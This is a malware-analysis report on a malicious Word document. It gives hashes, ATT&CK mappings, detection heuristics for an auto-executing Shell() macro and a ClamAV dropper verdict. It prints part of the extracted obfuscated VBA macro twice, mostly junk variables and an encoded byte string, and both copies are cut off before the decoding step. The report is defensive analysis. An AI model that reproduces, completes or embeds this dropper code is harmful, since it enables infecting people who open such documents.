Office (OLE) malware analysis — malicious · 874d05dc84b98a69

MALICIOUS

Office (OLE)

252.0 KB Created: 2016-01-13 21:03:00 Authoring application: Microsoft Office Word First seen: 2017-12-08

MD5: 3a14f42b4d63f725a521bd1539cafcc6 SHA-1: b480465d634a281f12a1ffd2e915d400868b651b SHA-256: 874d05dc84b98a694bd3f8ec0382460d45e749dc3c84b76bf08d3b201692cc94

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The critical OLE_VBA_SHELL heuristic indicates that the VBA macro within this document attempts to execute commands using the Shell() function. This is further supported by the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic, which flags an auto-execution routine (Document_Open) that uses execution tokens. The ClamAV detection 'Doc.Dropper.Agent-6387323-0' strongly suggests a dropper functionality, where the macro likely downloads and executes a secondary payload. The document body content is obfuscated and does not provide direct clues to the specific lure.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6387323-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6387323-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37738 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	37738 bytes
SHA-256: `108f280d9bbbb3fb49325c3dfbcc809a442fd5f43b8fb53ecf6dd020aeb90784`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub TotYhyFZt() LJnEanrCUw4 = "96" & "69" On Error Resume Next JLXBLR5EpL = "22" & "95" Dim PRKsuVOb As String, FANUo8nzX1niT3V() As String, S3m8cvPikr As Integer HPmBRQ = "56" & "25" PRKsuVOb = PRKsuVOb & "169,166,162,232,175,179,52,17,69,107,104,115,21,106,49,60,50,0,104,109,11,74,50,55,5,45,100,56,7,7,72,3,69,80,85,94,92,88,58,60,63,63,53,50,51,123,120,100,39,36,98,94,63,40,85,87,125,44,0,100,91,7,12,91,80,75,35,107,17,109,2,96,87,121,111,94,110,69,20,38,33,107,30,92,25,38,116,106,38,18,53,63,89,66,43,25,31,1,9,4,17,3,28,120,125,126,113,8,108,56,74,65,98,101,111,19,25,40,120,117,39,26,26,63,8,9,18,61,140,145,250,205,204,164,191,185,251,151,224,218,242,169,219,190,155,200,245,197,183,255,227,242,156,248,208,195,251,155,206,243,243,177,187,183,214,163,168,223,255,239,160,211,186,251,206,235,220,196,215,205,241,216,206,218,190,222,215,175,246,139,129,241,237,244,228,164,148,194,168,213,207,201,140,175,195,156,143,139,217,140,196,196,205,206,177,135,217,183,219,138,147,217,25" LqODznA9mF6TTE = "4" & "64" PRKsuVOb = PRKsuVOb & "3,129,198,194,251,210,239,165,235,146,157,149,143,159,139,153,253,151,227,209,166,211,179,212,132,221,252,192,35,58,81,61,84,60,75,11,81,72,120,83,66,91,126,124,80,119,86,110,22,127,63,52,12,56,49,34,37,44,115,9,75,66,15,66,249,225,136,194,173,195,39,91,80,118,45,73,80,68,4,108,78,25,75,75,20,74,106,127,6,108,127,24,120,87,70,127,35,113,78,119,58,53,50,48,61,66,120,127,99,61,18,39,7,44,54,67,59,81,72,103,91,73,105,95,94,81,102,42,80,84,31,74,110,89,112,113,72,35,41,75,86,83,117,69,127,9,23,34,48,33,20,80,92,3,34,42,3,47,46,55,111,122,98,97,116,122,114,98,99,5,13,127,42,114,59,70,104,111,92,113,106,30,104,12,62,14,105,59,116,112,57,10,205,228,250,187,180,168,142,158,224,213,130,144,130,140,153,144,139,156,145,136,143,129,129,225,146,206,224,238,181,174,167,253,130,218,135," MI31Dkm = "86" & "72" PRKsuVOb = PRKsuVOb & "187,177,227,173,132,183,206,170,141,178,203,164,207,129,209,165,246,250,214,186,153,155,250,236,160,189,186,165,160,213,198,202,216,209,213,221,177,204,154,188,190,158,152,166,177,227,147,227,181,224,229,243,128,235,212,205,131,248,255,179,229,199,228,239,203,167,165,158,168,169,160,185,130,138,181,239,162,182,224,173,152,139,231,226,225,250,255,52,34,37,46,60,44,2,22,16,21,6,3,7,17,20,30,115,81,67,107,78,125,29,18,108,113,84,116,98,41,62,56,100,15,104,106,236,94,57,56,30,45,42,96,118,10,14,90,7,100,127,72,1,83,102,124,111,31,72,97,104,77,74,67,43,69,34,100,50,83,123,85,99,89,57,62,65,36,34,61,21,108,77,34,81,22,37,25,27,72,83,57,85,91,32,58,30,0,37,9,32,62,115,84,84,115,42,47,17,30,0,44,50,51,66,95,72,65,78,67,52,92,27,39,59,58,53,64,122,59,64,91,18,19,100,61,127,14,30,7" R2IYtorhfukoKI = "56" & "44" PRKsuVOb = PRKsuVOb & ",25,0,27,6,98,96,115,127,117,96,96,78,85,71,102,104,51,77,5,226,201,246,152,147,151,247,245,222,238,203,208,209,136,213,139,133,148,157,252,208,196,225,235,221,234,233,139,131,188,186,214,133,219,183,130,149,141,158,226,225,225,180,139,157,175,185,198,197,248,194,188,158,233,177,159,162,233,235,212,220,185,175,171,198,206,206,195,199,179,205,195,221,210,209,165,205,201,181,252,153,196,244,197,169,163,168,240,207,186,165,136,170,173,212,252,237,158,237,236,244,182,218,251,235,133,145,235,229,167,248,153,157,174,230,182,133,145,156,131,138,177,86,81,125,90,99,75,94,87,27,127,5,79,14,115,72,99,41,58,110,8,114,49,25,19,56,21,95,19,44,31,63,69,46,12,71,45,183,176,217,208,222,233,76,98,106,114,108,3,14,8,6,4,101,17,111,25,99,18,30,12,0,14,104,100,106,103,117,97,59,32,81,121,76," KR9874ZLc = "76" & "43" PRKsuVOb = PRKsuVOb & "82,50,8,41,32,7,0,19,38,59,26,53,32,109,112,56,67,102,97,91,86,83,124,124,116,37,40,82,51,62,57,49,42,12,57,0,2,63,54,46,69,21,53,35,74,63,19,118,88,44,6,63,72,37,107,9,66,38,80,117,98,67,58,22,37,55,42,38,3,58,46,39,55,7,30,92,38,123,62,22,111,81,31,106,98,6 ... (truncated)

SHA-256: 108f280d9bbbb3fb49325c3dfbcc809a442fd5f43b8fb53ecf6dd020aeb90784

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub TotYhyFZt()
LJnEanrCUw4 = "96" & "69"
On Error Resume Next
JLXBLR5EpL = "22" & "95"
Dim PRKsuVOb As String, FANUo8nzX1niT3V() As String, S3m8cvPikr As Integer
HPmBRQ = "56" & "25"
PRKsuVOb = PRKsuVOb & "169,166,162,232,175,179,52,17,69,107,104,115,21,106,49,60,50,0,104,109,11,74,50,55,5,45,100,56,7,7,72,3,69,80,85,94,92,88,58,60,63,63,53,50,51,123,120,100,39,36,98,94,63,40,85,87,125,44,0,100,91,7,12,91,80,75,35,107,17,109,2,96,87,121,111,94,110,69,20,38,33,107,30,92,25,38,116,106,38,18,53,63,89,66,43,25,31,1,9,4,17,3,28,120,125,126,113,8,108,56,74,65,98,101,111,19,25,40,120,117,39,26,26,63,8,9,18,61,140,145,250,205,204,164,191,185,251,151,224,218,242,169,219,190,155,200,245,197,183,255,227,242,156,248,208,195,251,155,206,243,243,177,187,183,214,163,168,223,255,239,160,211,186,251,206,235,220,196,215,205,241,216,206,218,190,222,215,175,246,139,129,241,237,244,228,164,148,194,168,213,207,201,140,175,195,156,143,139,217,140,196,196,205,206,177,135,217,183,219,138,147,217,25"
LqODznA9mF6TTE = "4" & "64"
PRKsuVOb = PRKsuVOb & "3,129,198,194,251,210,239,165,235,146,157,149,143,159,139,153,253,151,227,209,166,211,179,212,132,221,252,192,35,58,81,61,84,60,75,11,81,72,120,83,66,91,126,124,80,119,86,110,22,127,63,52,12,56,49,34,37,44,115,9,75,66,15,66,249,225,136,194,173,195,39,91,80,118,45,73,80,68,4,108,78,25,75,75,20,74,106,127,6,108,127,24,120,87,70,127,35,113,78,119,58,53,50,48,61,66,120,127,99,61,18,39,7,44,54,67,59,81,72,103,91,73,105,95,94,81,102,42,80,84,31,74,110,89,112,113,72,35,41,75,86,83,117,69,127,9,23,34,48,33,20,80,92,3,34,42,3,47,46,55,111,122,98,97,116,122,114,98,99,5,13,127,42,114,59,70,104,111,92,113,106,30,104,12,62,14,105,59,116,112,57,10,205,228,250,187,180,168,142,158,224,213,130,144,130,140,153,144,139,156,145,136,143,129,129,225,146,206,224,238,181,174,167,253,130,218,135,"
MI31Dkm = "86" & "72"
PRKsuVOb = PRKsuVOb & "187,177,227,173,132,183,206,170,141,178,203,164,207,129,209,165,246,250,214,186,153,155,250,236,160,189,186,165,160,213,198,202,216,209,213,221,177,204,154,188,190,158,152,166,177,227,147,227,181,224,229,243,128,235,212,205,131,248,255,179,229,199,228,239,203,167,165,158,168,169,160,185,130,138,181,239,162,182,224,173,152,139,231,226,225,250,255,52,34,37,46,60,44,2,22,16,21,6,3,7,17,20,30,115,81,67,107,78,125,29,18,108,113,84,116,98,41,62,56,100,15,104,106,236,94,57,56,30,45,42,96,118,10,14,90,7,100,127,72,1,83,102,124,111,31,72,97,104,77,74,67,43,69,34,100,50,83,123,85,99,89,57,62,65,36,34,61,21,108,77,34,81,22,37,25,27,72,83,57,85,91,32,58,30,0,37,9,32,62,115,84,84,115,42,47,17,30,0,44,50,51,66,95,72,65,78,67,52,92,27,39,59,58,53,64,122,59,64,91,18,19,100,61,127,14,30,7"
R2IYtorhfukoKI = "56" & "44"
PRKsuVOb = PRKsuVOb & ",25,0,27,6,98,96,115,127,117,96,96,78,85,71,102,104,51,77,5,226,201,246,152,147,151,247,245,222,238,203,208,209,136,213,139,133,148,157,252,208,196,225,235,221,234,233,139,131,188,186,214,133,219,183,130,149,141,158,226,225,225,180,139,157,175,185,198,197,248,194,188,158,233,177,159,162,233,235,212,220,185,175,171,198,206,206,195,199,179,205,195,221,210,209,165,205,201,181,252,153,196,244,197,169,163,168,240,207,186,165,136,170,173,212,252,237,158,237,236,244,182,218,251,235,133,145,235,229,167,248,153,157,174,230,182,133,145,156,131,138,177,86,81,125,90,99,75,94,87,27,127,5,79,14,115,72,99,41,58,110,8,114,49,25,19,56,21,95,19,44,31,63,69,46,12,71,45,183,176,217,208,222,233,76,98,106,114,108,3,14,8,6,4,101,17,111,25,99,18,30,12,0,14,104,100,106,103,117,97,59,32,81,121,76,"
KR9874ZLc = "76" & "43"
PRKsuVOb = PRKsuVOb & "82,50,8,41,32,7,0,19,38,59,26,53,32,109,112,56,67,102,97,91,86,83,124,124,116,37,40,82,51,62,57,49,42,12,57,0,2,63,54,46,69,21,53,35,74,63,19,118,88,44,6,63,72,37,107,9,66,38,80,117,98,67,58,22,37,55,42,38,3,58,46,39,55,7,30,92,38,123,62,22,111,81,31,106,98,6
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.